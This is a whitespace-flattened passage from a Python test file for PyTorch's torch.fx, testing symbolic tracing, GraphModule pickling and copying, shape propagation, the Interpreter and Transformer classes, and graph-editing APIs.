4)) ct = ConstTensor() traced = symbolic_trace(ct) traced.graph.lint() traced(torch.rand(4, 4)) def test_pickle_graphmodule(self): class Nested(torch.nn.Module): def __init__(self): super().__init__() self.st = torch.nn.Linear(4, 4) def forward(self, x): return self.st(x) n = Nested() traced = symbolic_trace(n) traced.graph.lint() pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() x = torch.rand(3, 4) self.assertEqual(loaded(x), traced(x)) def test_pickle_custom_import(self): graph = torch.fx.Graph() a = graph.placeholder('x') b = graph.placeholder('y') c = graph.call_function(a_non_torch_leaf, (a, b)) d = graph.call_function(torch.sin, (c,)) graph.output(d) gm = GraphModule(torch.nn.Module(), graph) pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) loaded.graph.lint() x, y = torch.rand(1), torch.rand(1) self.assertEqual(loaded(x, y), gm(x, y)) def test_all_input_nodes(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.placeholder('x') b : torch.fx.Node = graph.call_module('linear_mod', args=(a,)) c : torch.fx.Node = graph.get_attr('y_attr') d : torch.fx.Node = graph.call_function(operator.add, args=(b, c)) e : torch.fx.Node = graph.call_function(torch.unsqueeze, args=(d, 0)) graph.output(e) graph.lint() self.assertEqual(b.all_input_nodes, [a]) self.assertEqual(c.all_input_nodes, []) self.assertEqual(d.all_input_nodes, [b, c]) self.assertEqual(e.all_input_nodes, [d]) def test_deepcopy_graphmodule_with_transform(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() def transform(traced): new_graph = torch.fx.Graph() val_map : Dict[Node, Node] = {} output_value = new_graph.graph_copy(traced.graph, val_map) relu_out = new_graph.create_node( op='call_method', target='neg', args=(output_value,), kwargs={}) new_graph.output(relu_out) return GraphModule(traced, new_graph) transformed = transform(traced) transformed.graph.lint() copied = copy.deepcopy(transformed) self.assertNotEqual(id(type(transformed)), id(type(copied))) x = torch.randn(3, 4) self.assertEqual(copied(x), transformed(x)) def test_deepcopy_with_submods_params(self): class Bar(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) def forward(self, x): return torch.relu(x) + self.param class Baz(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.bar = Bar() def forward(self, x): return self.bar(x) - self.param baz = Baz() traced = symbolic_trace(baz) traced.graph.lint() copied = copy.deepcopy(traced) copied.graph.lint() def test_deepcopy_graph_with_tracer_cls(self): class TestTracer(Tracer): def is_leaf_module(self, module, name): return True g = Graph(tracer_cls=TestTracer) x = g.placeholder("x") g.output(x) h = copy.deepcopy(g) self.assertIsNotNone(h._tracer_cls) self.assertTrue(g._tracer_cls == h._tracer_cls) def test_unpack_list_better_error(self): class SomeArgs(torch.nn.Module): def forward(self, a, b): return torch.rand(3, 4) class UnpacksList(torch.nn.Module): def __init__(self): super().__init__() self.sa = SomeArgs() def forward(self, x : list): return self.sa(*x) ul = UnpacksList() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ul) def test_unpack_dict_better_error(self): class SomeKwargs(torch.nn.Module): def forward(self, x=3, y=4): return torch.rand(3, 4) class UnpacksDict(torch.nn.Module): def __init__(self): super().__init__() self.sk = SomeKwargs() def forward(self, x : dict): return self.sk(**x) ud = UnpacksDict() with self.assertRaisesRegex(TraceError, 'Proxy object cannot be iterated.'): symbolic_trace(ud) def test_pretty_print_targets(self): # Test that Graph pretty-print prints friendly name for targets # in `operator` and `builtins` class SomeMod(torch.nn.Module): def forward(self, x): return torch.add(x.foo + x.bar, 3.0) traced = symbolic_trace(SomeMod()) graph_str = str(traced.graph) self.assertIn('builtins.getattr', graph_str) self.assertIn('operator.add', graph_str) self.assertIn('torch.add', graph_str) def test_pretty_print_node(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.param: torch.nn.Parameter = torch.nn.Parameter( torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x: torch.Tensor, y: int = 2): return self.linear(x[y] + self.param).clamp(min=0.0, max=1.0) traced = symbolic_trace(M()) all_formatted = "\n".join([n.format_node() for n in traced.graph.nodes]) FileCheck().check("x").check("placeholder") \ .check("y").check("placeholder") \ .check("getitem").check("call_function") \ .check("param").check("get_attr") \ .check("add").check("call_function") \ .check("linear").check("call_module") \ .check("clamp").check("call_method") \ .run(all_formatted) def test_script_tensor_constant(self): # TorchScript seems to ignore attributes that start with `__`. # We used to call anonymous Tensor values `__tensor_constant*`, but # they were getting ignored by script. Now they're called # `_tensor_constant*` class IHaveATensorConstant(torch.nn.Module): def forward(self, x): return x + torch.rand(3, 4) traced = torch.fx.symbolic_trace(IHaveATensorConstant()) torch.jit.script(traced) def test_autowrap_functions(self): class AutowrapFnTest(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) class AutowrapFnTest2(torch.nn.Module): def forward(self, x): return fx_int(x.shape[0] / 2) + fx_int_x2(x.shape[0] / 2) # Check function(s) are wrapped # `int` would normally throw a TypeError as argument can't be `Proxy` tracer = Tracer(autowrap_functions=(fx_int,)) graph = tracer.trace(AutowrapFnTest()) traced = GraphModule(tracer.root, graph, 'test') tracer_2 = Tracer(autowrap_functions=(fx_int, fx_int_x2)) tracer_2.trace(AutowrapFnTest2()) # Test scriptability traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(4)), 2) def test_torch_fx_len(self): class FXLenTest(torch.nn.Module): def forward(self, x): return len(x) traced = symbolic_trace(FXLenTest()) self.assertEqual(traced(torch.rand(3, 4)), 3) # Test scriptability scripted = torch.jit.script(FXLenTest()) self.assertEqual(scripted(torch.rand(3)), 3) traced_scripted = torch.jit.script(traced) self.assertEqual(traced_scripted(torch.rand(3)), 3) # Test non-proxy len class FXLenTest2(torch.nn.Module): def __init__(self): super().__init__() self.l = [3, 4, 5] def forward(self, x): return x + len(self.l) traced2 = symbolic_trace(FXLenTest2()) inp = torch.rand(3, 4) self.assertEqual(traced2(inp), inp + 3.0) self.assertIs(len, builtins.len) def test_torch_fx_getattr(self): class FXGetattrTest(torch.nn.Module): def forward(self, x): return getattr(x, 'nonexistent_attr', torch.Tensor([2, 3])) traced = symbolic_trace(FXGetattrTest()) self.assertEqual(traced(torch.rand(3, 4)), torch.Tensor([2, 3])) def test_sqrt(self): class Sqrt1(torch.nn.Module): def forward(self, x): return sqrt(x.size(0)) class Sqrt2(torch.nn.Module): def forward(self, x): return math.sqrt(x.size(0)) class Sqrt3(torch.nn.Module): def forward(self, x): return x + math.sqrt(2) + sqrt(2) self.checkGraphModule(Sqrt1(), [torch.zeros(8)]) self.checkGraphModule(Sqrt2(), [torch.zeros(8)]) self.checkGraphModule(Sqrt3(), [torch.zeros(8)]) self.assertIs(sqrt, _sqrt) self.assertIs(math.sqrt, _sqrt) def test_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() out = gm(input) self.assertEqual(out, ref_out) def test_pickle_torch_custom_ops(self): class M(torch.nn.Module): def forward(self, a): b = torch.ops.aten.sigmoid(a) c = torch.ops.aten.cat([a, b]) return torch.ops.aten.cat((c, c)) m = M() input = torch.randn(3) ref_out = m(input) gm = symbolic_trace(m) gm.graph.lint() pickled = pickle.dumps(gm) loaded = pickle.loads(pickled) self.assertEqual(loaded(input), gm(input)) def test_pretty_print(self): st = SimpleTest() traced = symbolic_trace(st) traced.graph.lint() printed = str(traced) assert 'SimpleTest()' in printed assert 'torch.relu' in printed def test_pretty_print_graph(self): class KwargPrintTest(torch.nn.Module): def forward(self, x): return torch.squeeze(x + 3.0, dim=2) st = KwargPrintTest() traced = symbolic_trace(st) traced.graph.lint() stringed = str(traced.graph) for s in ['args', 'kwargs', '#users']: assert s in stringed def test_custom_proxy_type(self): class TensorPair: def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair(x : TensorPair, y : TensorPair): s = x.add(y) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair(x, y) traced = symbolic_trace(use_tensor_pair) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_type_literal(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_literal(x : TensorPair): s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3))) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) ref_out = use_tensor_pair_literal(x) traced = symbolic_trace(use_tensor_pair_literal) traced_out = traced(x) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_dynamic_value(self): class TensorPair(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, left, right): self.left, self.right = left, right def add(self, other): l = self.left + other.left r = self.right + other.right return TensorPair(l, r) def mul(self, other): l = self.left * other.left r = self.right * other.right return TensorPair(l, r) def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor): s = x.add(TensorPair(y, y)) return s.mul(x) x = TensorPair(torch.randn(5, 3), torch.randn(5, 3)) y = torch.randn(5, 3) ref_out = use_tensor_pair_ctor(x, y) traced = symbolic_trace(use_tensor_pair_ctor) traced_out = traced(x, y) self.assertEqual(traced_out.left, ref_out.left) self.assertEqual(traced_out.right, ref_out.right) def test_custom_proxy_input_dependent_control_flow(self): class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta): def __init__(self, inp): if inp.sum() == 0: self.is_zero = True self.tensor = torch.tensor([]) else: self.is_zero = False self.tensor = inp def add(self, other): if self.is_zero: return ZeroTensor(other.tensor) elif other.is_zero: return self def use_zero_tensor(x : torch.Tensor, y : torch.Tensor): return ZeroTensor(x + y) x, y = torch.randn(5, 3), torch.randn(5, 3) ref_out = use_zero_tensor(x, y) traced = symbolic_trace(use_zero_tensor) traced_out = traced(x, y) self.assertEqual(traced_out.is_zero, ref_out.is_zero) self.assertEqual(traced_out.tensor, ref_out.tensor) def test_graph_fns(self): g = Graph() a = g.placeholder('a') b = g.call_module('linear', (a,)) c = g.get_attr('bias') d = g.call_method('add', (b, c)) e = g.call_function(torch.sin, (d,)) g.output(e) mod = torch.nn.Module() mod.linear = torch.nn.Linear(3, 4) mod.bias = torch.rand(4) gm = GraphModule(mod, g) gm.graph.lint() input = torch.rand(3) r = gm(input) ref = torch.sin(mod.linear(input) + mod.bias) self.assertEqual(r, ref) def test_remove_uses(self): g : torch.fx.Graph = Graph() x : torch.fx.Node = g.placeholder('x') relu : torch.fx.Node = g.call_function(torch.relu, (x,)) neg : torch.fx.Node = g.call_function(torch.neg, (relu,)) g.output(neg) neg.replace_all_uses_with(relu) g.erase_node(neg) self.assertTrue(neg not in relu.users) def test_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(3, 4) symbolic_trace(eb) def test_pickle_nonetype_annotation(self): eb = torch.nn.EmbeddingBag(10, 3, mode='sum') traced = symbolic_trace(eb) pickled = pickle.dumps(traced) loaded = pickle.loads(pickled) loaded.graph.lint() input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9]) offsets = torch.LongTensor([0, 4]) self.assertEqual(loaded(input, offsets), traced(input, offsets)) def test_return_tuple(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: return (x, x + x) original = M() traced = symbolic_trace(original) self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1))) def test_construct_root_dict(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) linear_mod : torch.nn.Module = torch.nn.Linear(3, 4) add_param : torch.Tensor = torch.rand(3, 4) gm : torch.fx.GraphModule = torch.fx.GraphModule( {'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph) gm.graph.lint() assert 'self.foo.bar.baz' in gm.code x : torch.Tensor = torch.rand(3, 3) out : torch.Tensor = gm(x) ref_out : torch.Tensor = linear_mod(x) + add_param self.assertEqual(out, ref_out) def test_symbolic_trace_assert(self): class AssertsTensorShape(torch.nn.Module): def forward(self, x): torch._assert(x.shape[1] > 4, "assert_foobar") return x m = AssertsTensorShape() # verify traceability traced = symbolic_trace(m) # verify assertion on traced model works correctly at runtime traced(torch.rand(4, 5)) with self.assertRaisesRegex(AssertionError, "assert_foobar"): traced(torch.rand(4, 3)) # verify the symbolically traced module is scriptable ms = torch.jit.script(m) with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"): ms(torch.rand(4, 3)) def test_fx_create_arg(self): class CustomArgObject: def __init__(self, x, y): self.x = x self.y = y def __fx_create_arg__(self, tracer: torch.fx.Tracer): return tracer.create_node( "call_function", CustomArgObject, args=( tracer.create_arg(self.x), tracer.create_arg(self.y), ), kwargs={}, ) class HasCustomArgObjectWhenLeaf(torch.nn.Module): def forward(self, o: CustomArgObject): # Not normally traceable; good reason to make # this module a leaf. for x in o.x: o.y += x return o.y class Root(torch.nn.Module): def __init__(self): super().__init__() self.inner = HasCustomArgObjectWhenLeaf() def forward(self, x, y): o = CustomArgObject(x, y) return self.inner(o) class CreateArgTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is HasCustomArgObjectWhenLeaf m = Root() graph = CreateArgTracer().trace(m) gm = torch.fx.GraphModule(m, graph) assert "CustomArgObject(" in gm.code def test_trace_fn_constant(self): some_constant = torch.rand(3, 4) def add_const(x): return some_constant + x traced = symbolic_trace(add_const) input = torch.rand(3, 4) self.assertEqual(traced(input), add_const(input)) def test_copy_no_remap(self): traced = symbolic_trace(SimpleTest()) g = traced.graph copied = torch.fx.Graph() for node in g.nodes: copied.node_copy(node) with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'): copied.lint() def test_wrong_topo(self): graph : torch.fx.Graph = torch.fx.Graph() a : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,)) c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam') d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c)) graph.output(d) nodes = list(graph.nodes) nodes[3].append(nodes[2]) with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'): graph.lint() def test_wrong_target_type(self): graph : torch.fx.Graph = torch.fx.Graph() with self.assertRaises(ValueError): n = torch.fx.Node(graph=graph, name='foo', op='call_function', target='foo', args=(), kwargs={}) def test_example_shape_prop(self): class TestCase(torch.nn.Module): def __init__(self): super().__init__() self.attr = torch.randn(3, 4) self.submod = torch.nn.Linear(4, 4) def forward(self, x): return torch.neg(self.submod(x.relu() + self.attr)) tc = TestCase() tc_traced = symbolic_trace(tc) ref_out = tc_traced(torch.rand(3, 4)) shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4)) # Make sure we're testing all opcodes opcodes = set() output_shape : Optional[torch.Shape] = None output_stride : Optional[Tuple[int]] = None for node in tc_traced.graph.nodes: opcodes.add(node.op) if node.op == 'output': output_shape = node.args[0].meta['tensor_meta'].shape output_stride = node.args[0].meta['tensor_meta'].stride self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method', 'call_module', 'output'])) # Test shape propogation and make sure results match actual self.assertEqual(output_shape, ref_out.shape) self.assertEqual(output_stride, ref_out.stride()) def test_shape_prop_layout(self): class ConvTest(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv2d(5, 5, 3) def forward(self, x): return self.conv_mod(x) # contiguous layout test_mod = ConvTest() traced = symbolic_trace(test_mod) x = torch.randn(5, 5, 224, 224) shape_prop.ShapeProp(traced).propagate(x) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced.graph.nodes)) x_channels_last = x.contiguous(memory_format=torch.channels_last) traced.to(memory_format=torch.channels_last) shape_prop.ShapeProp(traced).propagate(x_channels_last) for node in traced.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last) def test_shape_prop_aggregate(self): class ReturnTwo(torch.nn.Module): def forward(self, x): return (3, torch.sum(x)) class UnderTest(torch.nn.Module): def __init__(self): super().__init__() self.rt = ReturnTwo() def forward(self, x): return self.rt(x) ut = UnderTest() class RTTracer(torch.fx.Tracer): def is_leaf_module(self, m, module_qualified_name): return type(m) is ReturnTwo graph = RTTracer().trace(ut) mod = torch.fx.GraphModule(ut, graph) shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4)) for node in mod.graph.nodes: if node.op == 'call_module': assert 'tensor_meta' in node.meta tensor_meta = node.meta['tensor_meta'] assert tensor_meta[0] == 3 assert tensor_meta[1].shape == torch.Size([]) def test_shape_prop_layout_3d(self): class ConvTest3d(torch.nn.Module): def __init__(self): super().__init__() self.conv_mod = torch.nn.Conv3d(5, 5, 3) def forward(self, x): return self.conv_mod(x) test_mod_3d = ConvTest3d() traced_3d = symbolic_trace(test_mod_3d) x_3d = torch.randn(5, 5, 224, 224, 15) shape_prop.ShapeProp(traced_3d).propagate(x_3d) assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format for node in traced_3d.graph.nodes)) x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d) traced_3d.to(memory_format=torch.channels_last_3d) shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d) for node in traced_3d.graph.nodes: # NB: the implementation of conv may not preserve the memory format, # unfortunately. The best we can do is just check that the placeholder # node is channels-last if node.op in {'placeholder'}: self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d) def test_interpreter(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) interpreter = Interpreter(gm) input = torch.randn(3, 4) self.assertEqual(interpreter.run(input), gm(input)) self.assertEqual(interpreter.run(input), m(input)) def test_interpreter_run_node_override(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) class RunNodeInterpreter(Interpreter): def __init__(self, module): super().__init__(module) def run_node(self, n : Node) -> Any: result = super().run_node(n) n.cached_value = result return result input = torch.randn(3, 4) RunNodeInterpreter(gm).run(input) for node in gm.graph.nodes: assert hasattr(node, 'cached_value') def test_interpreter_onthefly_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapInterpreter(Interpreter): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) input = torch.randn(3, 4) result = NegSigmSwapInterpreter(gm).run(input) self.assertEqual(result, torch.neg(input).sigmoid()) def test_interpreter_partial_eval(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) gm = torch.fx.symbolic_trace(MyModule()) interp = Interpreter(gm) env = {} for node in gm.graph.nodes: if node.op == 'call_module' and node.target == 'linear': env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0 break assert len(env) == 1 x = torch.randn(3, 4) result = interp.run(x, initial_env=env) self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0)) def test_interpreter_star_args(self): def with_star_args(x, *args): return x + args[0] gm = torch.fx.symbolic_trace(with_star_args) interp = Interpreter(gm) result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4)) self.assertEqual(result, torch.ones(3, 4) * 2.0) @skipIfNoTorchVision def test_interpreter_noop_resnet18(self): rn18 = torchvision_models.resnet18() transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform() inp = torch.randn(5, 3, 224, 224) self.assertEqual(transformed(inp), rn18(inp)) @skipIfNoTorchVision def test_interpreter_gc_values(self): rn18 = torchvision_models.resnet18() interp = Interpreter(symbolic_trace(rn18)) inp = torch.rand(5, 3, 224, 224) out = interp.run(inp) env_key_names = set(n.name for n in interp.env.keys()) self.assertEqual(env_key_names, set(['output'])) def test_transformer_noop(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): return self.linear(x + self.param).clamp(min=0.0, max=1.0) m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_transformer_op_swap(self): def fn(x): return torch.sigmoid(x).neg() gm = torch.fx.symbolic_trace(fn) class NegSigmSwapXformer(Transformer): def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == torch.sigmoid: return torch.neg(*args, **kwargs) return super().call_function(n) def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any: if target == 'neg': call_self, *args_tail = args return call_self.sigmoid(*args_tail, **kwargs) return super().call_method(n) transformed = NegSigmSwapXformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(transformed(input), torch.neg(input).sigmoid()) def test_transformer_multi_outputs(self): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.param = torch.nn.Parameter(torch.rand(3, 4)) self.linear = torch.nn.Linear(4, 5) def forward(self, x): x = x + self.param out = self.linear(x) return x, out m = MyModule() gm = torch.fx.symbolic_trace(m) new_gm = Transformer(gm).transform() input = torch.randn(3, 4) self.assertEqual(new_gm(input), gm(input)) def test_fn_type_annotations(self): class Foo(torch.nn.Module): def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]: return {'a': p.x + p.y + z + i} foo_scripted = torch.jit.script(Foo()) foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) fxed = symbolic_trace(Foo()) fxed_scripted = torch.jit.script(fxed) fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3) def test_fn_type_annotation_empty(self): def forward(a : List[torch.Tensor]): return a[0] torch.jit.script(symbolic_trace(forward)) def test_wrapped_method(self): def wrap_with_relu(fn): @functools.wraps(fn) def wrapper(*args, **kwargs): return torch.relu(fn(*args, **kwargs)) return wrapper class Foo(torch.nn.Module): @wrap_with_relu def forward(self, x, w): return torch.matmul(x, w) f = Foo() traced = symbolic_trace(f) x, w = torch.rand(3, 4), torch.rand(4, 4) self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes)) def test_empty_graph_codegen(self): graph = torch.fx.Graph() gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(gm(), None) def test_sequential(self): m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1)) gm = torch.fx.symbolic_trace(m) gm_copy = copy.deepcopy(gm) def test_ctx_mgr(self): @contextlib.contextmanager def do_nothing(): yield class M(torch.nn.Module): def __init__(self): super().__init__() @do_nothing() def forward(self, x): return torch.relu(x) m = M() self.checkGraphModule(m, (torch.rand(3, 4),)) def test_typename_print(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,), type_expr=List[float]) output : torch.fx.Node = graph.output(b) self.assertTrue('typing.List[float]' in str(graph)) def test_layout(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x): return torch.empty_like(x, layout=torch.strided, pin_memory=False).fill_(0) traced = symbolic_trace(M()) x = torch.rand(5, 9, 3, 4) self.assertEqual(traced(x), torch.zeros_like(x)) def test_ellipsis(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, x, y): return x + y[:, 1:10, ...] traced = symbolic_trace(M()) x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4) self.assertEqual(traced(x, y), x + y[:, 1:10, ...]) def test_inf_nan(self): class FooMod(torch.nn.Module): def forward(self, x): return x + float('inf'), x + float('-inf'), x + float('nan') fm = FooMod() self.checkGraphModule(fm, (torch.rand(3, 4),)) def test_inf_nan_kwds(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf') c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan') graph.output((b, c)) gm = torch.fx.GraphModule(torch.nn.Module(), graph) x = torch.rand(3, 4) self.assertEqual(gm(x), (x + float('inf'), x + float('nan'))) def test_deepcopy_recursion_depth(self): depth = sys.getrecursionlimit() + 20 g = torch.fx.Graph() x = g.placeholder('x') for i in range(depth): x = g.call_function(torch.relu, (x,)) g.output(x) copied_graph = copy.deepcopy(g) val_map = {} for orig_node, new_node in zip(g.nodes, copied_graph.nodes): val_map[orig_node] = new_node for orig_node, new_node in zip(g.nodes, copied_graph.nodes): orig_users = set(orig_node.users.keys()) orig_users_equiv = set(val_map[u] for u in orig_users) new_users = set(new_node.users.keys()) self.assertEqual(orig_users_equiv, new_users) @skipIfNoTorchVision def test_replace_uses(self): rn18 = torchvision_models.resnet18() class LowerReluTracer(torch.fx.Tracer): def is_leaf_module(self, m : torch.nn.Module, qualname : str): if isinstance(m, torch.nn.ReLU): return False return super().is_leaf_module(m, qualname) rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18)) to_erase = [] for node in rn18_traced.graph.nodes: if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]: kwargs = node.kwargs.copy() # Neg doesn't have in-place kwargs.pop('inplace') with rn18_traced.graph.inserting_before(node): new_node = rn18_traced.graph.call_function( the_function=torch.neg, args=node.args, kwargs=node.kwargs) node.replace_all_uses_with(replace_with=new_node) to_erase.append(node) for node in to_erase: rn18_traced.graph.erase_node(node) def test_replace_input(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) b.replace_input_with(x, y) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input_x = torch.randn(33, 44) input_y = torch.randn(11, 22) self.assertEqual(gm(input_x, input_y), torch.relu(input_y)) def test_insertion_point(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) with graph.inserting_before(b): neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) gm = torch.fx.GraphModule(torch.nn.Module(), graph) input = torch.randn(33, 44) self.assertEqual(gm(input), torch.relu(torch.neg(input))) def test_update_args_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_arg(0, y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_update_kwargs_api(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') y : torch.fx.Node = graph.create_node('placeholder', 'y') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x}) output : torch.fx.Node = graph.output(b) orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph) inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5) self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x)) b.update_kwarg('input', y) new_gm = torch.fx.GraphModule(torch.nn.Module(), graph) self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y)) def test_move_before(self): graph : torch.fx.Graph = torch.fx.Graph() x : torch.fx.Node = graph.create_node('placeholder', 'x') b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,)) output : torch.fx.Node = graph.output(b) neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,)) _, *relu_args = b.args b.args = (neg, *relu_args) b.prepend(neg) gm = torch.fx.GraphModule(torch.nn.Module(), 